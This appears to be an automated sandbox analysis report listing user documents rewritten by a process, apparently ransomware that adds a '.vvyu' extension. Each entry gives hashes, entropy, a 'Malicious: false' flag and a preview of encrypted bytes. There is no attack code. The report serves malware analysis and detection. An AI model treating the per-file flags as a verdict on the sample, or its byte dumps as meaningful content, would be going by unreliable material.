Preview:	BJZFP.~.o....d..%.U..^..$..<...e...VC.-..c...y.b..[.{G..D...I.`.:...Y..Y.%.......\..@...%(&.!.f...k.....@YI..9...X.........?..o.49._..v...V.(X.<P..U.c..(....Q....4...Gb:.h.9n.e@.J.s.r`.$.48.t.).....P.4q....].....hE.%.........U....(.s:./.&7.RHf[.M....m4V.^P.f.l.@..........40.e......K.3Pe^...:d.......[Y..iRO"...".....>...@.uE..)0..-.Ka:.....8......f..1p.s.8m3...V..M1`....nKNZ..U..V:ae....Q`.;I...!.../..k}]+2..Bd.....{.... .7...a..$eD).x....t_..{.=...Zc...x!P~.g..?..^.......I,,U.v {c0....Y.J(>.R@{.w..6\|.?W..;.;..K)5'~~...f&YJ.1ADp{(.^..\.[GMI....v....E.>...s.....[..g...6o.......)._.]a...-^..q".Fj.x.....J{.D.G.....'...nq........@....1.(.8."..U..v....b...X.C7...9j<..B9W.......O.0..0?....F.;.'2..2G..m8d.3U....7h.....Q......]....R..4%.u....i..Pc.mP...R...m.cp.W..h..0=a.=..o.9i[..gu.....2.&N..xYJS.\..V.1.S9.Df.p;..M...d....'../..#...hXu....lCd...H?.m.,...tA.y.T...G.^..eQ..1.....L3..c..p$6M...l;{{........K...S..q.y.^.?.".+....X...KiS.W

C:\Users\user\Documents\BJZFPPWAPT.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830687836402105
Encrypted:	false
SSDEEP:	24:eG6PsLb0bO5fV+DnLX19ppR4fKYSDMKntJn7MSf2RsMOkLrAS1BmIhhTTY6sbD:kUAO5fADnLHiKdYK/n7ydvAyHTvmD
MD5:	E3B79D545C811B21849F7E051563E5D3
SHA1:	5A17D24CD08CEC635AEDEA8C9689BC7A39B9E51D
SHA-256:	A1E48E978097F8E0BF6C3F999302EEFABB6674E4A041CA9031892A129EF30E90
SHA-512:	B588786E3FA5A472CCC598BF29D2840579CFDD1403DAD5CD109B7B8DBBF46F37C8E42945B15DDC7F9582CF4B0DEAA1D9D15AF2B1005150DDB22C690C8B1F4A26
Malicious:	false
Preview:	BJZFP.~.o....d..%.U..^..$..<...e...VC.-..c...y.b..[.{G..D...I.`.:...Y..Y.%.......\..@...%(&.!.f...k.....@YI..9...X.........?..o.49._..v...V.(X.<P..U.c..(....Q....4...Gb:.h.9n.e@.J.s.r`.$.48.t.).....P.4q....].....hE.%.........U....(.s:./.&7.RHf[.M....m4V.^P.f.l.@..........40.e......K.3Pe^...:d.......[Y..iRO"...".....>...@.uE..)0..-.Ka:.....8......f..1p.s.8m3...V..M1`....nKNZ..U..V:ae....Q`.;I...!.../..k}]+2..Bd.....{.... .7...a..$eD).x....t_..{.=...Zc...x!P~.g..?..^.......I,,U.v {c0....Y.J(>.R@{.w..6\|.?W..;.;..K)5'~~...f&YJ.1ADp{(.^..\.[GMI....v....E.>...s.....[..g...6o.......)._.]a...-^..q".Fj.x.....J{.D.G.....'...nq........@....1.(.8."..U..v....b...X.C7...9j<..B9W.......O.0..0?....F.;.'2..2G..m8d.3U....7h.....Q......]....R..4%.u....i..Pc.mP...R...m.cp.W..h..0=a.=..o.9i[..gu.....2.&N..xYJS.\..V.1.S9.Df.p;..M...d....'../..#...hXu....lCd...H?.m.,...tA.y.T...G.^..eQ..1.....L3..c..p$6M...l;{{........K...S..q.y.^.?.".+....X...KiS.W

C:\Users\user\Documents\BJZFPPWAPT.xlsx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.824404134254253
Encrypted:	false
SSDEEP:	24:wyIFj4w6V5ECnNjITLa4XiUbSuWk0va0SSfYTjmP1ZeNpxuZ1FQT+IBlsbD:wyPwAbjLUdSut0SjEi41ZMqFo+IbmD
MD5:	AC3C67CEC724C1DCC3DC3687FA9CBD13
SHA1:	E83FDCE1B8BB6B3DA72A6ABD1FE44E99FA8A2102
SHA-256:	C3BCDE55BDE241FE46385E835B72F0B49858BCCA5568CEA30BB019B070DAD7A2
SHA-512:	AD854B775C430C0111772BEE7B661F04C95CE50DCC68E1AA34421D2AE821321B6F2C89DDF984785BF65555E9A42287446A0477FF1FC6364378E246D71D03659A
Malicious:	false
Preview:	BJZFP&2..&M..... ...xRn2.`..G.@Q..a3.....6.V..1..`........>$...9 ...{....O..H....>c.SF.(....y4.X....-....2..!X.....+.c...R22.....>..Z...{..k.........m..A...o.....z......kn.`..S0..J)..$...u...:...d. .....G.:.V.L.n.....J..M%.)[.6A..EfcGZ...}e./.......9f.L,...%..1......tK..... ...D..:lv>].e/n..n....<..0........6.N..3.<..~......+zu9U\|...&.N..asS...^...K....v......O....d.....:....w....._,F-.......:N.5.=.....H.wq...:..s.8i.Feyz.h...BPd....%$.;b.....6.'...8..U...C......R..mm7..GF...2E......O_.+ot....N.vE..6J._a.}0.a....k.`2.Ol...........T.0..0Vi..W].&....o?-...3..^..l...u...+.ot....rJb.{f...{K!....et..$.K.230P..Pag2M.'....5.CT...(.j.}W......l.J..V..@.Rh\|..F..9..X...y...zT....t.n..c..,....@....(.]..+.+...@..DI.....W.n..4./,........Ho.d..?=..d....{........7x<....a.....Pl.s.a..E.\|_..x....w..2&J!.....c...J.....qyh.+jcm.5...4.#..z..'.6....E......u......k0.&...R..@P... ..#%Bc{........?*.....^S.U.2gm.....q....VJ.O4.F.?.1...<...

C:\Users\user\Documents\BJZFPPWAPT.xlsx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.824404134254253
Encrypted:	false
SSDEEP:	24:wyIFj4w6V5ECnNjITLa4XiUbSuWk0va0SSfYTjmP1ZeNpxuZ1FQT+IBlsbD:wyPwAbjLUdSut0SjEi41ZMqFo+IbmD
MD5:	AC3C67CEC724C1DCC3DC3687FA9CBD13
SHA1:	E83FDCE1B8BB6B3DA72A6ABD1FE44E99FA8A2102
SHA-256:	C3BCDE55BDE241FE46385E835B72F0B49858BCCA5568CEA30BB019B070DAD7A2
SHA-512:	AD854B775C430C0111772BEE7B661F04C95CE50DCC68E1AA34421D2AE821321B6F2C89DDF984785BF65555E9A42287446A0477FF1FC6364378E246D71D03659A
Malicious:	false
Preview:	BJZFP&2..&M..... ...xRn2.`..G.@Q..a3.....6.V..1..`........>$...9 ...{....O..H....>c.SF.(....y4.X....-....2..!X.....+.c...R22.....>..Z...{..k.........m..A...o.....z......kn.`..S0..J)..$...u...:...d. .....G.:.V.L.n.....J..M%.)[.6A..EfcGZ...}e./.......9f.L,...%..1......tK..... ...D..:lv>].e/n..n....<..0........6.N..3.<..~......+zu9U\|...&.N..asS...^...K....v......O....d.....:....w....._,F-.......:N.5.=.....H.wq...:..s.8i.Feyz.h...BPd....%$.;b.....6.'...8..U...C......R..mm7..GF...2E......O_.+ot....N.vE..6J._a.}0.a....k.`2.Ol...........T.0..0Vi..W].&....o?-...3..^..l...u...+.ot....rJb.{f...{K!....et..$.K.230P..Pag2M.'....5.CT...(.j.}W......l.J..V..@.Rh\|..F..9..X...y...zT....t.n..c..,....@....(.]..+.+...@..DI.....W.n..4./,........Ho.d..?=..d....{........7x<....a.....Pl.s.a..E.\|_..x....w..2&J!.....c...J.....qyh.+jcm.5...4.#..z..'.6....E......u......k0.&...R..@P... ..#%Bc{........?*.....^S.U.2gm.....q....VJ.O4.F.?.1...<...

C:\Users\user\Documents\BNAGMGSPLO.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860632344521208
Encrypted:	false
SSDEEP:	24:RKksA3tkglLDr0o+IjX1yRxBdDer7DPxg+koZMD+UDB8X1vsbD:PsA9kglLDr09IbQXqr7qNIW+imtmD
MD5:	86D31A2A0B9451F418E833CA4B7793BA
SHA1:	CFF055BA53CEA60323F52264B430471AA424C992
SHA-256:	E0C4B1845FAE4EC22CD99AF87BDD94600859431D9578DDF19C4E206D1A8C3B1F
SHA-512:	93ED992096F663D791DEDF7BC36D7AAD2B02FF6F175B435782A88F319652CC677999A044EDAF946CDC4CD88452D08F29AC5C8C5171D9BB25D18C82A562D86999
Malicious:	false
Preview:	BNAGM]b.}F...:......%.T1m..-(...]v........MT#. .....M.h...s...?.s'..&.`g.NxKn.....{E7.O.}...BPz#OL...m.p......)...$.....^..u...t.>......4....[..V:.R.P...6.2......tC<.Fi.T.`....nEQ..Sh...'...'M...9J..S3..L.}S.T.i.,.5.........$VR.8Y..(@.0Z.k..N..c?e..l..S..i...K&.......3.B...\e......$S.....&.n.:1.-.....P..XS.h.\.+.B\|...U .....\We...o>wi.......u.+.}......a5Pu.....o3...#.....i...i.Q..or...8......g..g^....T]`.X....P.`R..a.v..j...~yz`....6..;&..)...G~N...y....1........y..g...~2a.o.U.s...I..ou.......~.7N"...yWI[..p[...u......&.?!d_..b..K.....7p........[l.z...e..;...3.q.%....tb.......z..=6+......t.w:......./..A4s.`.ty.j....<.q...t.p[.?.cv.@D.F...x...RV.i......b.,.G.73N..fDom...s.k..4~....Jz..s..pK.<{......'....:.98Z.U......n"<.\:...'8r.*F...6...J[jy.$..pC.....Il.b.....Yf"..%..^%k.....,8.\|.$O._..X.~J]}.5.&G..]...z.Y.rj''.e....N.....}...s.uY.:E.@...N9....\.<!g,80{-6..r.C......Y.X......-.J.:.H..~>.j........s...\..W.<...F.....n......

C:\Users\user\Documents\BNAGMGSPLO.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860632344521208
Encrypted:	false
SSDEEP:	24:RKksA3tkglLDr0o+IjX1yRxBdDer7DPxg+koZMD+UDB8X1vsbD:PsA9kglLDr09IbQXqr7qNIW+imtmD
MD5:	86D31A2A0B9451F418E833CA4B7793BA
SHA1:	CFF055BA53CEA60323F52264B430471AA424C992
SHA-256:	E0C4B1845FAE4EC22CD99AF87BDD94600859431D9578DDF19C4E206D1A8C3B1F
SHA-512:	93ED992096F663D791DEDF7BC36D7AAD2B02FF6F175B435782A88F319652CC677999A044EDAF946CDC4CD88452D08F29AC5C8C5171D9BB25D18C82A562D86999
Malicious:	false
Preview:	BNAGM]b.}F...:......%.T1m..-(...]v........MT#. .....M.h...s...?.s'..&.`g.NxKn.....{E7.O.}...BPz#OL...m.p......)...$.....^..u...t.>......4....[..V:.R.P...6.2......tC<.Fi.T.`....nEQ..Sh...'...'M...9J..S3..L.}S.T.i.,.5.........$VR.8Y..(@.0Z.k..N..c?e..l..S..i...K&.......3.B...\e......$S.....&.n.:1.-.....P..XS.h.\.+.B\|...U .....\We...o>wi.......u.+.}......a5Pu.....o3...#.....i...i.Q..or...8......g..g^....T]`.X....P.`R..a.v..j...~yz`....6..;&..)...G~N...y....1........y..g...~2a.o.U.s...I..ou.......~.7N"...yWI[..p[...u......&.?!d_..b..K.....7p........[l.z...e..;...3.q.%....tb.......z..=6+......t.w:......./..A4s.`.ty.j....<.q...t.p[.?.cv.@D.F...x...RV.i......b.,.G.73N..fDom...s.k..4~....Jz..s..pK.<{......'....:.98Z.U......n"<.\:...'8r.*F...6...J[jy.$..pC.....Il.b.....Yf"..%..^%k.....,8.\|.$O._..X.~J]}.5.&G..]...z.Y.rj''.e....N.....}...s.uY.:E.@...N9....\.<!g,80{-6..r.C......Y.X......-.J.:.H..~>.j........s...\..W.<...F.....n......

C:\Users\user\Documents\DUUDTUBZFW.jpg

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.868377942557234
Encrypted:	false
SSDEEP:	24:/j2zmtlVA0io8s5zTomhF2YuJnh9HGJbix4ousJ8jT3TsYBsbD:r2YXA0jD5zToSk9hU00sJ8Pw8mD
MD5:	7D5F664B81813CFDCED78EC00EDCE57E
SHA1:	DE4A978D9258A6E50DC3EB6625319B88BC9F97A0
SHA-256:	EEC619C28B872ED804B3694044C75DD6410BB80183F821010AF124713958D0B4
SHA-512:	6165E51D01B3542CA64D80024059FFD420878598FA8B18B06CC6346F83AF7BEA23FD7974F6395E62CD27119EA4DC43F6670B7CD798CB8AA12C1C2E14BC03C54C
Malicious:	false
Preview:	DUUDTTL.S_u......m:.Yq..f>.xk....r./d._...y.....A.....H..p. .u..6}o5..c...iC.....br....4........6.....Em>%.ks......)7.A....:....=\.0.e..v.....k.0.G.......]...P.kW1.. c....[S...a.3M..E....E(U9...FK"e<..2I.B....!..2.%."L.K...(w.B.9......[......(#.....Ii.E..7.w&4.r._.z......'..K.ly.s.Pl....Z.,.K..!..^.......w.]H:c.l&...x....&.X'......s.D...O......r.Y.^.s.s.\|...<;...60...R.....k.E..pXq.!.x.......B........=8...r[...V91....b...;.....n?..9..jF.......=..`k@T._..dZ."ug...^...Ri.oGC_>.....Le....^..9.P.....f.4.0.t.....t':U..B.\|...X8;)%....[(.=....v........{..Fu..Q~..,!q..G.....t7Z[G.].7..T..........5.....AR7.%-........._.'b.5..%..\.}...e..[...~...Q~Ej>....{u..Uhd_Bot.P{7...7<.4..-.6..t.\|.._u6..b.x.x.jrA..^\|5....e....Bj..d:..QY:....H.......8.T.g).p......=...7.-gX..1..jm"X.0.*.V...M.Zg.=Zy..O?3@....@ H.G...4\|...{.T{L.ui.LI..a..i.@...3XA.'..d.3.....6$.Z#r.....d.z/..)\|.(...I.0..j..y..d..;}...Jo...[.....#........,..%..... .E$.29Q...7%..k....P..D....

C:\Users\user\Documents\DUUDTUBZFW.jpg.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.868377942557234
Encrypted:	false
SSDEEP:	24:/j2zmtlVA0io8s5zTomhF2YuJnh9HGJbix4ousJ8jT3TsYBsbD:r2YXA0jD5zToSk9hU00sJ8Pw8mD
MD5:	7D5F664B81813CFDCED78EC00EDCE57E
SHA1:	DE4A978D9258A6E50DC3EB6625319B88BC9F97A0
SHA-256:	EEC619C28B872ED804B3694044C75DD6410BB80183F821010AF124713958D0B4
SHA-512:	6165E51D01B3542CA64D80024059FFD420878598FA8B18B06CC6346F83AF7BEA23FD7974F6395E62CD27119EA4DC43F6670B7CD798CB8AA12C1C2E14BC03C54C
Malicious:	false
Preview:	DUUDTTL.S_u......m:.Yq..f>.xk....r./d._...y.....A.....H..p. .u..6}o5..c...iC.....br....4........6.....Em>%.ks......)7.A....:....=\.0.e..v.....k.0.G.......]...P.kW1.. c....[S...a.3M..E....E(U9...FK"e<..2I.B....!..2.%."L.K...(w.B.9......[......(#.....Ii.E..7.w&4.r._.z......'..K.ly.s.Pl....Z.,.K..!..^.......w.]H:c.l&...x....&.X'......s.D...O......r.Y.^.s.s.\|...<;...60...R.....k.E..pXq.!.x.......B........=8...r[...V91....b...;.....n?..9..jF.......=..`k@T._..dZ."ug...^...Ri.oGC_>.....Le....^..9.P.....f.4.0.t.....t':U..B.\|...X8;)%....[(.=....v........{..Fu..Q~..,!q..G.....t7Z[G.].7..T..........5.....AR7.%-........._.'b.5..%..\.}...e..[...~...Q~Ej>....{u..Uhd_Bot.P{7...7<.4..-.6..t.\|.._u6..b.x.x.jrA..^\|5....e....Bj..d:..QY:....H.......8.T.g).p......=...7.-gX..1..jm"X.0.*.V...M.Zg.=Zy..O?3@....@ H.G...4\|...{.T{L.ui.LI..a..i.@...3XA.'..d.3.....6$.Z#r.....d.z/..)\|.(...I.0..j..y..d..;}...Jo...[.....#........,..%..... .E$.29Q...7%..k....P..D....

C:\Users\user\Documents\EEGWXUHVUG.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84853485335511
Encrypted:	false
SSDEEP:	24:xbU4VRT+00lStsqJ2k0SIQubZj+SJPKsAgToV8Z5i6v5arasbD:xbUu+07tsq4SIQuFj+631oV8RBOamD
MD5:	AB4EC7152BCB238FDBEBDF242A698B40
SHA1:	13BDA01A5809C70BE2AFDFA96CC1605D80BBC34B
SHA-256:	5E466B0344143E071605B59270B5A1FFDB9E4E4C8B216213279F6104B0A64B1B
SHA-512:	D5E71F96DC91A99281EA5122284CE9F98660363F6AF1AF563E4240E28906617427A3B412AE980B30A49CFED7751A8BA4CFADB42793D90355C40AE9042BFBF426
Malicious:	false
Preview:	EEGWX.`..k.....g..r.\|.Zv....".7.:....:{...Y.......!.W<.x(-i.[AOH.\S<W.x{$.{X=.?vI.{.'.1J..j...[.S_.MtX$..h2.c.TD...=...."........n\|ImDl.....?J.s........4_g0..X...V'L...-.fL..x[../......./P\|.ZCA......%.F..d........d..`...6../...deje...2......}......yO..#.U...d.H=..Jz........K.sfn1...[.\.vn'...%.>...b:e)..S......Q-$.6@..J.....c!q.iB...]>........7y..Mr.}..j....~}..SBZ].T.mE..:a'p5...%..C.....O$4....=..O=.\.\~.%......Uz4..e...V1.oR.v......xX@H."Dq.....j....{_jb..#......Y..N-K.B....tENp7F. ....3...O..6.~..NOX......==#....u....~.1.~.#..>.&.T.Z..)...\..y..y.e&.05...V}...f.....6v]...\A...{_q.....&....I...g\.c).....r.D`...ZI2._.(.Zu.??.V.$.M.....y...!...\.........^~...w..Y.f.L..4.bB..;...d.....E.......8...Y.....D._......}..:.j\|..k.9......i...9.b..D(.,(CG...+..d.Q.@...Q..BC...i.1....Rr6b..../..y[..~j#.n....KS.<L..-...$ 6..{......{.}.h...?,u..D.nn.H.&O....6:z\.....;...#z...]..s.K...>.K.ym)....;....^..4..N..:.SYv{q.l.a`...~".Y.%.

C:\Users\user\Documents\EEGWXUHVUG.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84853485335511
Encrypted:	false
SSDEEP:	24:xbU4VRT+00lStsqJ2k0SIQubZj+SJPKsAgToV8Z5i6v5arasbD:xbUu+07tsq4SIQuFj+631oV8RBOamD
MD5:	AB4EC7152BCB238FDBEBDF242A698B40
SHA1:	13BDA01A5809C70BE2AFDFA96CC1605D80BBC34B
SHA-256:	5E466B0344143E071605B59270B5A1FFDB9E4E4C8B216213279F6104B0A64B1B
SHA-512:	D5E71F96DC91A99281EA5122284CE9F98660363F6AF1AF563E4240E28906617427A3B412AE980B30A49CFED7751A8BA4CFADB42793D90355C40AE9042BFBF426
Malicious:	false
Preview:	EEGWX.`..k.....g..r.\|.Zv....".7.:....:{...Y.......!.W<.x(-i.[AOH.\S<W.x{$.{X=.?vI.{.'.1J..j...[.S_.MtX$..h2.c.TD...=...."........n\|ImDl.....?J.s........4_g0..X...V'L...-.fL..x[../......./P\|.ZCA......%.F..d........d..`...6../...deje...2......}......yO..#.U...d.H=..Jz........K.sfn1...[.\.vn'...%.>...b:e)..S......Q-$.6@..J.....c!q.iB...]>........7y..Mr.}..j....~}..SBZ].T.mE..:a'p5...%..C.....O$4....=..O=.\.\~.%......Uz4..e...V1.oR.v......xX@H."Dq.....j....{_jb..#......Y..N-K.B....tENp7F. ....3...O..6.~..NOX......==#....u....~.1.~.#..>.&.T.Z..)...\..y..y.e&.05...V}...f.....6v]...\A...{_q.....&....I...g\.c).....r.D`...ZI2._.(.Zu.??.V.$.M.....y...!...\.........^~...w..Y.f.L..4.bB..;...d.....E.......8...Y.....D._......}..:.j\|..k.9......i...9.b..D(.,(CG...+..d.Q.@...Q..BC...i.1....Rr6b..../..y[..~j#.n....KS.<L..-...$ 6..{......{.}.h...?,u..D.nn.H.&O....6:z\.....;...#z...]..s.K...>.K.ym)....;....^..4..N..:.SYv{q.l.a`...~".Y.%.

C:\Users\user\Documents\EEGWXUHVUG.pdf

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845165083321486
Encrypted:	false
SSDEEP:	24:nnzfKcBsPHvBsuCZU/mMh2BdNtUhHdnD+sYbljOaPnKBMmkPsbD:nzyTP2uC41h2BsHlDtYbljvPKB/kPmD
MD5:	9CB07ABEF7D4406CA50E3BC463016DE7
SHA1:	D7589D57AB84E5463DD56EEF2CC1EFC004F57AE3
SHA-256:	6CA5CD6784C833412059B97D89F208FA0C40B0AB606A0EF95FFB5B39322310E7
SHA-512:	612714B1D3E48DB146D5495E3ECDB9EF4F87505C4B67871C5438BE6220BA6036C0E117D41AADF34C4B20238B12A76B5CB18FE16A5ED47ED632336E1FDF0DBF6D
Malicious:	false
Preview:	EEGWX..HV.V.D)..}...2o.X.Df..4......S.EJ..`.py..7.a..Hc>~i.>....u..DG..........S.e...v.8.]......AY..J...J...&...a..4..?x.S.j..d......i...w._'........~6...CG..<9.bru./....q.).....y...:'713B.A.....9..Jo...PN..`5b...N..k..o.;._B_.Y.sM..q.4C!di..0m>X.P%.>.H...u.v.......nD ..........L..&.}e.+B.......%.~.G...F.4..y+.....7..S......R....n;.L.W.t...V.s.......>..?.s..(...._$..\|...Gq...../...aw.../?.j.D...F...x,ml.d....r.a....;9.6..v.&:.i2U@...~..............zbc=U..4.).....,ZC..S.X..MIc.....=.Pha.....m....V.}A.6.......q.Y.3&>.?.....Ud.P.u..>u.......#..0....>.._..F&.._.Lm...3g;R.X7;..,ZrR......y.+..9..:..l......r.......T.w5.N.\|4%e.b..{].....e........vj.bZ['....t.2..d...W...RqG...F3..........&.V.(J(......5.v..U..! h.&a..l3i...JK...I.....&...`6.;...vQ.].(... J.rC.W1.#..W.,q..5.U...g.L......q.....EQ.. ...zn...k.V4Y+..P,.u.N.`.uw.......z....GWD".C-.'....Z.x.<...k......[H....<...'......`.J.S....t..._..\.>.......#k...1...:HT6...8P!...wU...S....P..E.b2.d.p&..."

C:\Users\user\Documents\EEGWXUHVUG.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845165083321486
Encrypted:	false
SSDEEP:	24:nnzfKcBsPHvBsuCZU/mMh2BdNtUhHdnD+sYbljOaPnKBMmkPsbD:nzyTP2uC41h2BsHlDtYbljvPKB/kPmD
MD5:	9CB07ABEF7D4406CA50E3BC463016DE7
SHA1:	D7589D57AB84E5463DD56EEF2CC1EFC004F57AE3
SHA-256:	6CA5CD6784C833412059B97D89F208FA0C40B0AB606A0EF95FFB5B39322310E7
SHA-512:	612714B1D3E48DB146D5495E3ECDB9EF4F87505C4B67871C5438BE6220BA6036C0E117D41AADF34C4B20238B12A76B5CB18FE16A5ED47ED632336E1FDF0DBF6D
Malicious:	false
Preview:	EEGWX..HV.V.D)..}...2o.X.Df..4......S.EJ..`.py..7.a..Hc>~i.>....u..DG..........S.e...v.8.]......AY..J...J...&...a..4..?x.S.j..d......i...w._'........~6...CG..<9.bru./....q.).....y...:'713B.A.....9..Jo...PN..`5b...N..k..o.;._B_.Y.sM..q.4C!di..0m>X.P%.>.H...u.v.......nD ..........L..&.}e.+B.......%.~.G...F.4..y+.....7..S......R....n;.L.W.t...V.s.......>..?.s..(...._$..\|...Gq...../...aw.../?.j.D...F...x,ml.d....r.a....;9.6..v.&:.i2U@...~..............zbc=U..4.).....,ZC..S.X..MIc.....=.Pha.....m....V.}A.6.......q.Y.3&>.?.....Ud.P.u..>u.......#..0....>.._..F&.._.Lm...3g;R.X7;..,ZrR......y.+..9..:..l......r.......T.w5.N.\|4%e.b..{].....e........vj.bZ['....t.2..d...W...RqG...F3..........&.V.(J(......5.v..U..! h.&a..l3i...JK...I.....&...`6.;...vQ.].(... J.rC.W1.#..W.,q..5.U...g.L......q.....EQ.. ...zn...k.V4Y+..P,.u.N.`.uw.......z....GWD".C-.'....Z.x.<...k......[H....<...'......`.J.S....t..._..\.>.......#k...1...:HT6...8P!...wU...S....P..E.b2.d.p&..."

C:\Users\user\Documents\EEGWXUHVUG\BJZFPPWAPT.pdf

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858013429900605
Encrypted:	false
SSDEEP:	24:K8V1o84708RP8yZVfu/wPwgIzxmm/RQN+Du2CNVp3tBwnyU2/W9T5+yQlqdNT112:KwgcakwPwT40eN+anNnLwyUXnZQlqdL8
MD5:	972BB2B5F79AD12F31464A83223102F3
SHA1:	7E3434C12387F20F34D26127D2010D8C45320386
SHA-256:	D85C55865DFC4B015D6FD263840E98A866DF491283C06E559BD201E1D58F2021
SHA-512:	7CA897506D4E912018E335786BA4C0A82A815084677AC9BACAA00479C1B45D93B8396E1525E2E73BD40693F60B488F683F921A6FC1AF6D2004AE2FD2BFAAD114
Malicious:	false
Preview:	BJZFP..21...fH......,.......`..-......4CS.c=-.!y$eIyoWY...`9.W#...Iz....4..g..jJ_.l.U....30.....dO..i..w.}.n..Y..S..\|....=..N;K..w....I....:..S.<...C.Z...x..ZR..OL.v^.?Z........W.s..m...j.,-.{..J-..<.T1$S....U.E....Z.,.}........7.>...zt&..A...u..1.2..hA.i..?.i..x%SK...%....>...0...}x.Fg..j...:h..$..G..ug...l.H...xt..#..F7.BW....^........`X........=...9ls.xh.......O.'4.A.#.........=&....R......q....`BQ57.O.\.I...)..i..~V.HaD.}._}..yx.2e2%...]..........@.........X}...A~1....Mp..,..y.7..Z.0+%$...MnmaT.&.C..T.I.@G.X...L...6A+..U6.]5..M....y..(.v3.J.n)f(.UHrp..}.M.z.6.....W.._8..-5.j...P1..9.l.".....A.~...D.3u....Y..m..b..7...h...N.j'.....C).1...8x.t..NN.nnc...r..YvK.K.A#..{;UN.~..R.8...io...M...x..Z6....0..u6.... .bg.".(& .G........Owm.......y...`7...../....S....r.+........?.........I.>..)g._.......T3.}.5..(.../@..h...`g.YO.(...fEz....E..01...?.<...a.~.B?._..e.."~...x.sE...N.v.,.-z.@m.~..=3^.......P..N;.Vz..Q...q....).`p..(

C:\Users\user\Documents\EEGWXUHVUG\BJZFPPWAPT.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858013429900605
Encrypted:	false
SSDEEP:	24:K8V1o84708RP8yZVfu/wPwgIzxmm/RQN+Du2CNVp3tBwnyU2/W9T5+yQlqdNT112:KwgcakwPwT40eN+anNnLwyUXnZQlqdL8
MD5:	972BB2B5F79AD12F31464A83223102F3
SHA1:	7E3434C12387F20F34D26127D2010D8C45320386
SHA-256:	D85C55865DFC4B015D6FD263840E98A866DF491283C06E559BD201E1D58F2021
SHA-512:	7CA897506D4E912018E335786BA4C0A82A815084677AC9BACAA00479C1B45D93B8396E1525E2E73BD40693F60B488F683F921A6FC1AF6D2004AE2FD2BFAAD114
Malicious:	false
Preview:	BJZFP..21...fH......,.......`..-......4CS.c=-.!y$eIyoWY...`9.W#...Iz....4..g..jJ_.l.U....30.....dO..i..w.}.n..Y..S..\|....=..N;K..w....I....:..S.<...C.Z...x..ZR..OL.v^.?Z........W.s..m...j.,-.{..J-..<.T1$S....U.E....Z.,.}........7.>...zt&..A...u..1.2..hA.i..?.i..x%SK...%....>...0...}x.Fg..j...:h..$..G..ug...l.H...xt..#..F7.BW....^........`X........=...9ls.xh.......O.'4.A.#.........=&....R......q....`BQ57.O.\.I...)..i..~V.HaD.}._}..yx.2e2%...]..........@.........X}...A~1....Mp..,..y.7..Z.0+%$...MnmaT.&.C..T.I.@G.X...L...6A+..U6.]5..M....y..(.v3.J.n)f(.UHrp..}.M.z.6.....W.._8..-5.j...P1..9.l.".....A.~...D.3u....Y..m..b..7...h...N.j'.....C).1...8x.t..NN.nnc...r..YvK.K.A#..{;UN.~..R.8...io...M...x..Z6....0..u6.... .bg.".(& .G........Owm.......y...`7...../....S....r.+........?.........I.>..)g._.......T3.}.5..(.../@..h...`g.YO.(...fEz....E..01...?.<...a.~.B?._..e.."~...x.sE...N.v.,.-z.@m.~..=3^.......P..N;.Vz..Q...q....).`p..(

C:\Users\user\Documents\EEGWXUHVUG\DUUDTUBZFW.jpg

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850364873561436
Encrypted:	false
SSDEEP:	24:nMCBdXb57BUHc/fnrkzwYgBI+etlgfyQe0Cnr2AZl1TCWXGSrBjjjqFV8sbD:nMCBdLpBUXcYgBIXUqmCr2AZPCWWStt+
MD5:	4F6796D8DE4A2640D589FA86DAAF6BF1
SHA1:	13AF9844AD3D7D58F8A56DBA5702E7EFAA9D73B3
